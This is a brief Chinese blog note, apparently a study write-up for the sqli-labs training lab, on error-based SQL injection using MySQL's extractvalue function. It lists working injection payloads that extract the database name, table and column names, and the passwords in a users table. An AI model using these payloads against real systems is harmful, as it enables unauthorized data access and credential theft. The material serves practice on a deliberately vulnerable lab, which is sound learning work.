Loading

报错

Sql-libs3

注入点检测   判断闭合  报错验证

 

 

利用extractvalueupdatexml函数的xpath参数错误会进行报错

Xpath中出现0x7e会报错

 

 

?id=1') and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

表名

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(table_name))from information_schema.tables where table_schema='security'),0x7e))--+

 

列名

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(column_name))from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

字段

 

 

 

?id=1') and extractvalue(1,concat(0x7e,(select (group_concat(password))from users),0x7e))--+

 

posted @ 2021-12-21 20:28  为伊消得人憔悴/  阅读(88)  评论(0)    收藏  举报